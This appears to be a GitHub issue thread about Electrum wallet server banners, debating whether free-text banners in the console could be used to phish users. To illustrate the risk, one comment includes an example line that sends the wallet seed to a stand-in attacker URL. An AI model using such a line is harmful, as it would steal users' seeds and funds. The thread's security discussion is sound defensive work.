Open wartjugger opened 5 years ago
I disagree with a standardized, simple server banner. Because servers are run freely by volunteers, they might want to advertise their services or domain names or etc. Or post whatever they want. I think this should stay as it is. Also, the banner can only be displayed in plain text and cannot send pop-ups like the custom error messages sent from server bug we had back then.
If we think this is a (less effective, but still) phishing vector, best solution is to put a warning, like standard header to any server banner that will display on a colored background (similar to how we have console warning: Do not paste here code you don't understand) that will state to not follow links and update instructions as those messages can be arbitrary sent by the server and bla bla.
As we know it's fairly easy for a malicious actor to set up an Electrum server. I don't see why server banners should serve as a platform for advertisements. Many Electrum server banners are neutral and do not contain any customized banners. Most bitcoin nodes (unrelated to electrum) are run freely by volunteers without an ability to advertise. Similarly, Tor relays or bridges are run by volunteers without any option for advertisements. I don't see that a customized banner is an important part in the decision to run a server. At any case there is an option to donate to the server from the Help menu.
Most users don't ever see those banners. The console tab is hidden by default.
I suggest to adopt a standardized, simple server banner. Not free text sent from the server.
For example, name / IP, version. That's it.
Speaking as a developer, I regularly rely on free-form banner text to find contact info for the operators of ElectrumX servers.
Tor relays or bridges are run by volunteers without any option for advertisements.
AFAIK Tor relays do have the ability to display freeform text in their descriptors, and many do so.
Tor relays or bridges are run by volunteers without any option for advertisements.
AFAIK Tor relays do have the ability to display freeform text in their descriptors, and many do so.
I've never seen any text beyond a nickname. Can you support this claim? where can this text be viewed? it's not displayed using arm or onioncircuits.
Yes, the claim it is true. Relay operators can put arbitrary extra data in their ContactInfo field as well as host a static HTML page (kind of like a banner) on their DirtPort using config option DirPortFrontPage.
It don't know if it can be viewed using onioncircuits. It's not visible from Tor Browser Bundle. Nor is the Electrum console visible by default though.
Yes, the claim it is true. Relay operators can put arbitrary extra data in their ContactInfo field as well as host a static HTML page (kind of like a banner) on their DirtPort using config option DirPortFrontPage.
It don't know if it can be viewed using onioncircuits. It's not visible from Tor Browser Bundle. Nor is the Electrum console visible by default though.
Thanks for the information. From what I know this is used mainly as legal disclaimers and address for complaints, a very common issue with exit relays. This information isn't used for advertisements as evident by the fact it doesn't appear in Tor browser, and requires separate action (looking up the IP of the relay and accessing it directly).
At any case I believe it's agreed that for an honest server operators, having this banner as an advertisement platform isn't likely to be a main consideration in the decision of running or not running it. People don't choose tor relays based on information on the DirPortFrontPage (and normally don't choose them at all although that's technically possible) and don't choose electrum servers based on a server banner.
Usage of sever banners for direct advertisements is unsolicited advertising at best, and a potential phishing delivery vector at worst.
If anyone is looking for the contact details of the electrum server operator they would normally be able to find them easily using the domain name (if the operator is interested to be found). If it's important to have it in the banner for some reason, then simple contact details such as an email could be one of the fields in a standardized banner.
Electrum console isn't visible by default but it's probably used by enough people for this to be added: https://github.com/spesmilo/electrum/pull/3700
This warning was added to prevent users from following instructions to run code that steals their funds.
This warning was added to prevent users from following instructions to run code that steals their funds.
That's well understood. In the same way, a server banner could negate this by including an instruction to run a short script that will steal their funds.
Welcome to ElectrumX version 123!
For best performance, start by running the following:
import requests; requests.get("http://we_steal_your_coins.com/?"+getseed())
This is a simplistic example of course.
Consider this: Fact 1 - if verified correctly, electrum client isn't malicious. Fact 2 - a user has no way to verify is an electrumX server is malicious or not.
Why allow any non-standard communication? didn't users lose enough money due to malicious servers messages, served by the client? this is simply another similar security hole.
From what I know this is used mainly as legal disclaimers and address for complaints, a very common issue with exit relays.
That is definitely not the only use case. A significant set of Tor relays list Bitcoin donation addresses in their descriptor, and there are lots of reasons why someone might want to contact a relay operator besides sending legal threats. (In particular, if a relay is misconfigured in a way that makes it harmful to the network, contacting the relay operator is desirable; this is also the reason I regularly need to look up contact info for ElectrumX servers.)
If anyone is looking for the contact details of the electrum server operator they would normally be able to find them easily using the domain name (if the operator is interested to be found)
And I suppose you expect DNS WHOIS queries to be able to turn up contact info such as Bitmessage or Cwtch addresses, or OpenPGP pubkeys, or the variety of other ways that users might want to be contacted besides a simple email address? What about servers that aren't accessed via the DNS, e.g. servers accessed via an onion service or an IP address?
If it's important to have it in the banner for some reason, then simple contact details such as an email could be one of the fields in a standardized banner.
Again, expecting that all server operators are okay with exclusively using email to accept contacts is unreasonable.
That's well understood. In the same way, a server banner could negate this by including an instruction to run a short script that will steal their funds.
Users don't randomly access the console of their own accord. The scams were happening because attackers were using social engineering to get the user to open the console. The fact that users could be scammed by a social engineering attack via a non-Electrum channel does not imply in any way that users could be scammed by the Electrum protocol banner. And in any event, the warning already says not to type commands you don't understand. If a user disobeys that advice because of something in a server banner, they really should have read the advice before clicking through it. (If you can think of a wording patch for that warning that reduces the risk of the user disregarding it in this case, feel free to suggest one.)
From what I know this is used mainly as legal disclaimers and address for complaints, a very common issue with exit relays.
That is definitely not the only use case. A significant set of Tor relays list Bitcoin donation addresses in their descriptor, and there are lots of reasons why someone might want to contact a relay operator besides sending legal threats. (In particular, if a relay is misconfigured in a way that makes it harmful to the network, contacting the relay operator is desirable; this is also the reason I regularly need to look up contact info for ElectrumX servers.)
If anyone is looking for the contact details of the electrum server operator they would normally be able to find them easily using the domain name (if the operator is interested to be found)
And I suppose you expect DNS WHOIS queries to be able to turn up contact info such as Bitmessage or Cwtch addresses, or OpenPGP pubkeys, or the variety of other ways that users might want to be contacted besides a simple email address? What about servers that aren't accessed via the DNS, e.g. servers accessed via an onion service or an IP address?
If it's important to have it in the banner for some reason, then simple contact details such as an email could be one of the fields in a standardized banner.
Again, expecting that all server operators are okay with exclusively using email to accept contacts is unreasonable.
That's well understood. In the same way, a server banner could negate this by including an instruction to run a short script that will steal their funds.
Users don't randomly access the console of their own accord. The scams were happening because attackers were using social engineering to get the user to open the console. The fact that users could be scammed by a social engineering attack via a non-Electrum channel does not imply in any way that users could be scammed by the Electrum protocol banner. And in any event, the warning already says not to type commands you don't understand. If a user disobeys that advice because of something in a server banner, they really should have read the advice before clicking through it. (If you can think of a wording patch for that warning that reduces the risk of the user disregarding it in this case, feel free to suggest one.)
Contacting ElectrumX servers operators issue: I'm not expecting anyone to use any particular way, what I do expect is that when operators want to be contacted, they'll make their details easily available. And if it's important for you to find those details, you'll manage to do it without having that info included in the server banners. I wonder how you cope today with all those servers that don't have operator details in the banners.
I believe my suggestion is important. I have shown one trivial way (attackers will be more creative, you can be sure) a malicious server could today scam users with misleading messages. The project has power to prevent this way, I did not see here a convincing argument why it shouldn't do so.
A lot of the anger users had in the massive "Electrum 4" phishing attack wasn't just about their losing the money, but because it seemed as if the attack and the instruction came from Electrum, that's why it was so easy for them to trust it. Many people didn't make the distinction between Electrum client and servers even after the issue was explained. It is "Electrum". In this case, while the issue I presented admittedly poses a smaller threat, there is a similarity. Here too it may seem to a user the attack comes from within the client. He gets instructions (or links) from within the wallet.
For anyone who is interested in a constructive discussion... would it be potentially desirable to move the banner from the Console to some other context, which might be less likely to confuse users? Does another UI context exist that's less likely to confuse users? It's not totally clear to me why the Python console and the banner are in the same tab to begin with... if nothing else it causes UX disruption if I'm typing a console command and the server switches while I'm typing.
Getting into a discussion about the different ways you may or may not contact a server operator who's interested in being contacted has very little relevancy to the security issue I have raised here, even more so when the common case is that contact details currently do not appear in most banners (a point you conveniently chose to ignore).
It's not totally clear to me why the Python console and the banner are in the same tab to begin with... if nothing else it causes UX disruption if I'm typing a console command and the server switches while I'm typing.
Finally some constructive comments!
even more so when the common case is that contact details currently do not appear in most banners (a point you conveniently chose to ignore).
I'm curious, do you actually maintain an Electrum client? Because I do, and I've used the banner contact info to contact operators of servers that were misbehaving. The fraction of servers you sampled that use that feature is quite immaterial to that reality.
Anyway, since I haven't seen any developers express any interest in this issue, I'm not going to bother spending any more time on this issue unless I see another developer do so first.
Please try and keep this discussion on topic.
Any suggestions on how to keep displaying the banner somewhere while making clear this is arbitrary text sent by the server?
Any suggestions on how to keep displaying the banner somewhere while making clear this is arbitrary text sent by the server?
I don't think a freetext banner is very important and is in fact security risk since a sever should be assumed potentially malicious, but if considered desirable by others for some reason a better location may be at the Tools -> Network window. Either as a "View banner" right click option in the Overview tab - "Connected node" table, or at the Server tab.
I think this is a good general rule (better avoid arbitrary text, rather than change it's location / context): https://github.com/spesmilo/electrum/issues/4968#issuecomment-450218389
That rule might sound good in principle but is rarely the case in practice: https://github.com/bitcoin/bitcoin/issues/16154
When a connection to server is made, the server banner is displayed in the Console, sometime containing instructions about updates or any other links.
This could potentially be another phishing vector.
I suggest to adopt a standardized, simple server banner. Not free text sent from the server.
For example, name / IP, version. That's it.